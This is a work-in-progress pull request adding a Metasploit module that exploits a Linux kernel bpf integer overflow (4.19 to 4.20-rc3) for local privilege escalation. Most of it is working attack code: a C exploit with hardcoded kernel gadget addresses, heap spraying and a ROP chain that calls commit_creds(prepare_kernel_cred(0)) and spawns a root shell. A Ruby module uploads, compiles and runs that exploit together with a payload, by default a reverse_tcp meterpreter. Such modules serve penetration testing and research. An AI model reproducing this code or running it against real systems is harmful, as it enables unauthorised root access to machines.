### PR TITLE
Add linux bpf local privilege escalation module 

### DIFF
--- a/data/exploits/bpf/exploit.c
+++ b/data/exploits/bpf/exploit.c
@@ -1,0 +1,223 @@
+#define _GNU_SOURCE
+#define SPRAY_NUMBER 14
+
+#include <endian.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#define native_write_cr4 0xffffffff81097fcc
+#define PREPARE_KERNEL_CRED 0xffffffff810e3670
+#define COMMIT_CREDS  0xffffffff810e33e0
+#define poprdiret 0xffffffff810013b9
+#define popraxret 0xffffffff81029c71
+#define swapgs 0xffffffff81c0095f
+#define iretq 0xffffffff8106d8f4
+#define stack_pivot_gadget 0xffffffff81954dc8
+#define stack_top_offset 0x674
+#define krop_base_to_map 0x81954000
+int rop_start=0x1444-8;
+void* krop_base_mapped;
+
+unsigned long user_cs, user_ss, user_rflags;
+
+static void save_state()
+{
+    asm(
+        "movq %%cs, %0\n"
+        "movq %%ss, %1\n"
+        "pushfq\n"
+        "popq %2\n"
+        : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags)
+        :
+        : "memory");
+}
+
+void get_shell()
+{
+    system("id");
+    char *shell = "/bin/sh";
+    char *args[] = {shell, NULL};
+    execve(shell, args, NULL);
+}
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+
+_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
+_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
+
+void get_root_payload(void)
+{
+    commit_creds(prepare_kernel_cred(0));
+}
+/*
+unsigned long rop_chain[] = {
+    poprdiret,
+    0x6f0,
+    native_write_cr4,
+    get_root_payload,
+    swapgs,
+    0, //dummy
+    iretq,
+    get_shell,
+    0,//user_cs,
+    0,//user_rflags,
+    0,//krop_base_mapped + 0x4000,
+    0//user_ss
+};
+*/
+#define POPRDX 0xffffffff81002dda
+//0xffffffff810d9c01 : push rax ; push rax ; ret
+#define DUMMY 0
+unsigned long rop_chain[] = {
+    popraxret,
+    0x6f0,
+    native_write_cr4,
+    poprdiret,
+    0,
+    PREPARE_KERNEL_CRED,
+    0xffffffff81001c50, //: pop rsi ; ret
+    poprdiret,
+    0xffffffff812646fb, //: push rax ; push rsi ; ret
+    COMMIT_CREDS,
+    swapgs,
+    (unsigned long)&get_shell,
+    0,//user_cs,
+    0,//user_rflags,
+    0,//krop_base_mapped + 0x4000,
+    0//user_ss
+};
+
+void * fakestack;
+void prepare_krop(){
+    krop_base_mapped=mmap((void *)krop_base_to_map,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
+    if (krop_base_mapped<0){
+        perror("mmap failed");
+    }
+    fakestack=mmap((void *)0xa000000000,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
+    *(unsigned long*)0x0000000081954dc8=popraxret;
+    *(unsigned long*)krop_base_to_map = 0;
+    *(unsigned long*)(krop_base_to_map+0x1000) = 0;
+    *(unsigned long*)(krop_base_to_map+0x2000) = 0;
+    *(unsigned long*)(krop_base_to_map+0x3000) = 0;
+    *(unsigned long*)(krop_base_to_map+0x4000) = 0;
+    *(unsigned long*)(krop_base_to_map+0x5000) = 0;
+    *(unsigned long*)(krop_base_to_map+0x6000) = 0;
+    *(unsigned long*)(krop_base_to_map+0x7000) = 0;
+    *(unsigned long*)(fakestack+0x4000) = 0;
+    *(unsigned long*)(fakestack+0x3000) = 0;
+    *(unsigned long*)(fakestack+0x2000) = 0;
+    *(unsigned long*)(fakestack+0x1000) = 0;
+    *(unsigned long*)(fakestack) = 0;
+    *(unsigned long*)(fakestack+0x10) = stack_pivot_gadget;
+    *(unsigned long*)(fakestack+0x7000) = 0;
+    *(unsigned long*)(fakestack+0x6000) = 0;
+    *(unsigned long*)(fakestack+0x5000) = 0;
+    rop_chain[12]=user_cs;
+    rop_chain[13]=user_rflags;
+    rop_chain[14]=(unsigned long)(fakestack + 0x6000);
+    rop_chain[15]=user_ss;
+    memcpy(krop_base_mapped+rop_start,rop_chain,sizeof(rop_chain));
+    puts("rop_payload_initialized");
+}
+
+#ifndef __NR_bpf
+#define __NR_bpf 321
+#endif
+
+uint64_t r[1] = {0xffffffffffffffff};
+
+// defragmentation
+void defragment(){
+    int i;
+    FILE* fp;
+    char name[100];
+    for(i=0; i<200; i++){
+        snprintf(name, 100, "xxx%d", i);
+        fp=fopen(name,"w");
+    }
+}
+
+long victim[SPRAY_NUMBER];
+void spray(){
+    int i;
+    for(i=0;i<SPRAY_NUMBER;i++){
+        victim[i] = syscall(__NR_bpf, 0, 0x200011c0, 0x2c);
+    }
+    return;
+}
+int main(void)
+{
+  syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
+  long res = 0;
+  *(uint32_t*)0x200011c0 = 0x17;
+  *(uint32_t*)0x200011c4 = 0;
+  //*(uint32_t*)0x200011c8 = 0x1000;
+  //*(uint32_t*)0x200011c8 = 0x200;
+  *(uint32_t*)0x200011c8 = 0x40;
+  *(uint32_t*)0x200011cc = -1;
+  *(uint32_t*)0x200011d0 = 0;
+  *(uint32_t*)0x200011d4 = -1;
+  *(uint32_t*)0x200011d8 = 0;
+  *(uint8_t*)0x200011dc = 0;
+  *(uint8_t*)0x200011dd = 0;
+  *(uint8_t*)0x200011de = 0;
+  *(uint8_t*)0x200011df = 0;
+  *(uint8_t*)0x200011e0 = 0;
+  *(uint8_t*)0x200011e1 = 0;
+  *(uint8_t*)0x200011e2 = 0;
+  *(uint8_t*)0x200011e3 = 0;
+  *(uint8_t*)0x200011e4 = 0;
+  *(uint8_t*)0x200011e5 = 0;
+  *(uint8_t*)0x200011e6 = 0;
+  *(uint8_t*)0x200011e7 = 0;
+  *(uint8_t*)0x200011e8 = 0;
+  *(uint8_t*)0x200011e9 = 0;
+  *(uint8_t*)0x200011ea = 0;
+  *(uint8_t*)0x200011eb = 0;
+
+  save_state();
+  prepare_krop();
+  res = syscall(__NR_bpf, 0, 0x200011c0, 0x2c);
+  if (res != -1)
+    r[0] = res;
+  spray();
+
+  *(uint32_t*)0x200000c0 = r[0];
+  *(uint64_t*)0x200000c8 = 0;
+  *(uint64_t*)0x200000d0 = 0x20000140;
+  *(uint64_t*)0x200000d8 = 2;
+  uint64_t* ptr = (uint64_t*)0x20000140;
+  ptr[0]=1;
+  ptr[1]=2;
+  ptr[2]=3;
+  ptr[3]=4;
+  ptr[4]=5;
+  ptr[5]=6;
+  ptr[6]=0xa000000000;
+  ptr[7]=8;
+  syscall(__NR_bpf, 2, 0x200000c0, 0x20);
+  int i;
+  *(unsigned long*)(fakestack+0x7000) = 0;
+  *(unsigned long*)(fakestack+0x6000) = 0;
+  *(unsigned long*)(fakestack+0x5000) = 0;
+  for(i=0;i<SPRAY_NUMBER;i++){
+      close(victim[i]);
+  }
+  pause();
+  return 0;
+}

--- a/documentation/modules/exploit/linux/local/bpf_privilege_escalation.md
+++ b/documentation/modules/exploit/linux/local/bpf_privilege_escalation.md
@@ -1,0 +1,13 @@
+## Summary
+There is an integer-overflow-to-buffer-overflow vulnerability in the bpf functions introduced in 4.19 and affect up to 4.20-rc3 leading to LPE, running the exploit gives a root shell in a custom compiled 4.19 or 4.20-rc3 system.
+
+## Verification Steps
+
+1.  Start `msfconsole`
+2.  Get a session
+3.  `use exploit/linux/local/bpf_privilege_escalation`
+4.  `set SESSION <ID>`
+5.  Verify you get a new root session
+
+## Source
+* https://seclists.org/oss-sec/2018/q4/170

--- a/modules/exploits/linux/local/bpf_privilege_escalation.rb
+++ b/modules/exploits/linux/local/bpf_privilege_escalation.rb
@@ -1,0 +1,161 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Linux Kernel bpf functions privilege escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on linux version 4.19 affected
+        up to 4.20-rc3 an heap overflow in bpf subsystem leading to LPE.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Wei Wu',           # Discovery
+          'syzkaller'         # C exploit
+          'Dhiraj Mishra'     # Metasploit module
+        ],
+      'DisclosureDate' => 'Nov 23 2018',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        => [[ 'Auto', {} ]],
+      'Privileged'     => true,
+      'References'     =>
+        [
+          [ 'URL', 'https://seclists.org/oss-sec/2018/q4/170' ],
+        ],
+      'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ])
+    ]
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    cmd_exec "chmod +x '#{path}'"
+  end
+
+  def upload_and_compile(path, data)
+    upload "#{path}.c", data
+
+    gcc_cmd = "gcc -o #{path} #{path}.c"
+    if session.type.eql? 'shell'
+      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
+    end
+    output = cmd_exec gcc_cmd
+    rm_f "#{path}.c"
+
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{path}.c failed to compile"
+    end
+
+    cmd_exec "chmod +x #{path}"
+  end
+
+  def exploit_data(file)
+    path = ::File.join Msf::Config.data_directory, 'exploits', 'bpf', file
+    fd = ::File.open path, 'rb'
+    data = fd.read fd.stat.size
+    fd.close
+    data
+  end
+
+  def live_compile?
+    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
+
+    if has_gcc?
+      vprint_good 'gcc is installed'
+      return true
+    end
+
+    unless datastore['COMPILE'].eql? 'Auto'
+      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
+    end
+  end
+
+  def check
+    vprint_status 'Checking if SMAP is enabled ...'
+    if smap_enabled?
+      vprint_error 'SMAP is enabled'
+      return CheckCode::Safe
+    end
+    vprint_good 'SMAP is not enabled'
+
+    arch = kernel_hardware
+    unless arch.include? 'x86_64'
+      vprint_error "System architecture #{arch} is not supported"
+      return CheckCode::Safe
+    end
+    vprint_good "System architecture #{arch} is supported"
+
+    unless userns_enabled?
+      vprint_error 'Unprivileged user namespaces are not permitted'
+      return CheckCode::Safe
+    end
+    vprint_good 'Unprivileged user namespaces are permitted'
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    unless check == CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target not vulnerable!'
+    end
+
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      upload_and_compile executable_path, exploit_data('exploit.c')
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      upload_and_chmodx executable_path, exploit_data('exploit.out')
+    end
+
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    print_status 'Launching exploit ...'
+    output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}"
+    output.each_line { |line| vprint_status line.chomp }
+    print_status "Cleaning up #{payload_path} and #{executable_path} ..."
+    rm_f executable_path
+    rm_f payload_path
+  end
+end

--- a/modules/exploits/linux/local/bpf_privilege_escalation.rb
+++ b/modules/exploits/linux/local/bpf_privilege_escalation.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Local
       'Author'         =>
         [
           'Wei Wu',           # Discovery
-          'syzkaller'         # C exploit
+          'syzkaller',        # C exploit
           'Dhiraj Mishra'     # Metasploit module
         ],
       'DisclosureDate' => 'Nov 23 2018',
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Local
   def upload_and_compile(path, data)
     upload "#{path}.c", data
 
-    gcc_cmd = "gcc -o #{path} #{path}.c"
+    gcc_cmd = "gcc -static -fno-pie -o #{path} #{path}.c"
     if session.type.eql? 'shell'
       gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
     end


### PR DESCRIPTION
<b>WIP - do no merge</b>

```
Linux heap overflow vulnerability exists in kernel bpf module, There is an integer-overflow 
to buffer-overflow vulnerability in the bpf functions introduced in 4.19 and affected up 
to 4.20-rc3, which leads to local privilege escalation.  
```
## Verification
List the steps needed to make sure this thing works
1. Start `msfconsole` 
2. Get a session
3. `use exploit/linux/local/bpf_privilege_escalation`
4. `set SESSION <ID>`
5. <b>Verify</b> you get a new <i>root</i> session

## Source
This requires a custom compiled 4.20-rc3 system to test this.
https://seclists.org/oss-sec/2018/q4/170